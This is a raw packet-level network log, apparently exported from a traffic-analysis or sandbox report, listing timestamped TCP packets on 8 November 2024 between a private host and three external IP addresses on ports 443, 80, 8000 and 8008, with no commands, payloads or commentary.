                                                                                                        Nov 8, 2024 11:12:04.851773977 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.851861954 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.851924896 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.852782965 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.852797031 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.852940083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.852940083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.852982998 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.852988005 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.853085041 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.853136063 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.854031086 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.854048967 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.854197025 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.854202032 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.854304075 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.854305029 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.854310036 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.854352951 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.854458094 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.034833908 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.035044909 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.035044909 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.035058022 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.035067081 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.035070896 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.035147905 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.035279989 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.035290003 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.035301924 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.035301924 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.035378933 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.035445929 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.036077976 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.036088943 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.036242962 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.036242962 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.036242962 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.036252975 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.036344051 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.036408901 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.037035942 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.037045956 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.037188053 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.037188053 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.037242889 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.037251949 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.037259102 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.037410975 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.038049936 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.038059950 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.038279057 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.038295031 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.038301945 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.038471937 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.038929939 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.038938046 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.039112091 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.039112091 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.039170980 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.039175034 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.039182901 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.039182901 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.039412022 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.039829016 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.039836884 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.040064096 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.040074110 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.040107965 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.040265083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.041348934 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.041357994 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.041538000 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.041538000 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.041598082 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.041608095 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.041615009 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.041615009 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.041757107 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.041766882 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.041845083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.041855097 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.041970015 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.041970015 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.041982889 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.041982889 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.042063951 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.042716026 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.042727947 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.042923927 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.042933941 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.042988062 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.043091059 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.043752909 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.043762922 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.043937922 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.043937922 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.043950081 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.044023037 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.044034004 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.044140100 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.044447899 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.044456959 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.044636965 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.044646978 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.044713974 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.044713974 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.044821024 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.045429945 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.045439959 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.045625925 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.045625925 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.045671940 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.045671940 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.045671940 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.045679092 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.045835972 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.046823025 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.046833992 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.047018051 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.047091961 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.047096968 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.047262907 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.047755003 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.047763109 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.047939062 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.047945023 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.048114061 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.048161983 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.048633099 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.048643112 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.048927069 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.048933029 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.049082994 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.059330940 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.059473038 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.059535027 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.059575081 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.059583902 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.059708118 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.059729099 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.059741020 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.059813976 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.059828043 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.059952021 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.059973955 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.060020924 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.060020924 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.060046911 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.060146093 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.060146093 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.060146093 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.060194969 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.060244083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.060244083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.060244083 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.060292006 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.170593023 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.170619965 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.170706987 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.170795918 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.170886993 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171001911 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171050072 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.171154022 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.171194077 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171194077 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171202898 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.171241999 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171339989 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171340942 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171437979 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171438932 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171487093 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171487093 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.171525955 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.171529055 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.171710968 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.172094107 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172094107 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172094107 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172094107 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172102928 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.172142029 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172142029 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172142029 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172142029 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172142029 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172142029 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172142982 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172142982 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172154903 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172154903 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172154903 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172154903 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172154903 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172154903 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172154903 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172154903 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172164917 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172238111 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172238111 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172282934 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:05.172290087 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172373056 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172374010 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172374010 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172374010 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172374010 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172487020 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172487020 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172497988 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172588110 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172729969 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:05.172740936 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:21.901536942 CET497898000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:22.089761019 CET80004978923.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:22.090012074 CET497898000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:22.090193987 CET497898000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:22.328691006 CET80004978923.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:22.808973074 CET80004978923.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:22.808984041 CET80004978923.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:22.809168100 CET80004978923.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:22.809178114 CET80004978923.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:22.809513092 CET497898000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:22.997677088 CET80004978923.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:22.997898102 CET497898000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:23.186249018 CET80004978923.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:23.186418056 CET497898000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:24.822551012 CET497908008192.168.11.30206.206.126.252
                                                                                                        Nov 8, 2024 11:12:25.159852982 CET800849790206.206.126.252192.168.11.30
                                                                                                        Nov 8, 2024 11:12:25.160114050 CET497908008192.168.11.30206.206.126.252
                                                                                                        Nov 8, 2024 11:12:25.160203934 CET497908008192.168.11.30206.206.126.252
                                                                                                        Nov 8, 2024 11:12:25.551090002 CET800849790206.206.126.252192.168.11.30
                                                                                                        Nov 8, 2024 11:12:25.559345007 CET800849790206.206.126.252192.168.11.30
                                                                                                        Nov 8, 2024 11:12:25.559355974 CET800849790206.206.126.252192.168.11.30
                                                                                                        Nov 8, 2024 11:12:25.559374094 CET800849790206.206.126.252192.168.11.30
                                                                                                        Nov 8, 2024 11:12:25.559381008 CET800849790206.206.126.252192.168.11.30
                                                                                                        Nov 8, 2024 11:12:25.559386969 CET800849790206.206.126.252192.168.11.30
                                                                                                        Nov 8, 2024 11:12:25.559552908 CET497908008192.168.11.30206.206.126.252
                                                                                                        Nov 8, 2024 11:12:25.559900999 CET497908008192.168.11.30206.206.126.252
                                                                                                        Nov 8, 2024 11:12:25.560045958 CET497908008192.168.11.30206.206.126.252
                                                                                                        Nov 8, 2024 11:12:25.897384882 CET800849790206.206.126.252192.168.11.30
                                                                                                        Nov 8, 2024 11:12:25.897723913 CET497908008192.168.11.30206.206.126.252
                                                                                                        Nov 8, 2024 11:12:29.383796930 CET4978480192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:29.500804901 CET8049784172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:29.501187086 CET4978480192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:37.585417986 CET497918000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:37.782236099 CET80004979123.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:37.782552958 CET497918000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:37.782723904 CET497918000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:38.016046047 CET80004979123.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:38.577191114 CET80004979123.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:38.577286005 CET80004979123.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:38.577296019 CET80004979123.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:38.577303886 CET80004979123.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:38.577506065 CET497918000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:38.768466949 CET80004979123.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:38.768815994 CET497918000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:38.960599899 CET80004979123.88.71.29192.168.11.30
                                                                                                        Nov 8, 2024 11:12:38.960750103 CET497918000192.168.11.3023.88.71.29
                                                                                                        Nov 8, 2024 11:12:40.826361895 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:40.826380968 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:40.826518059 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:40.826625109 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:40.826631069 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:41.044532061 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:41.045145988 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:41.045156002 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:41.045459032 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:41.045464039 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:41.905291080 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:41.905317068 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:41.905359983 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:41.905374050 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:41.905503035 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:41.905513048 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:41.905622959 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:41.958898067 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.155163050 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.155194044 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.155230045 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.155288935 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.155293941 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.155385971 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.155483961 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.155492067 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.155704975 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.208790064 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.406831980 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.406897068 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.406965017 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.406985044 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.407051086 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.407053947 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.407138109 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.407141924 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.407183886 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.407258034 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.407310963 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.407391071 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.407397985 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.407679081 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.645515919 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.645566940 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.645767927 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.645874023 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.646054983 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.646284103 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.646318913 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.646384954 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.646401882 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.646461010 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.646619081 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.646778107 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.646966934 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.647336006 CET49792443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:42.647344112 CET44349792172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:42.647515059 CET49792443192.168.11.30172.67.137.62
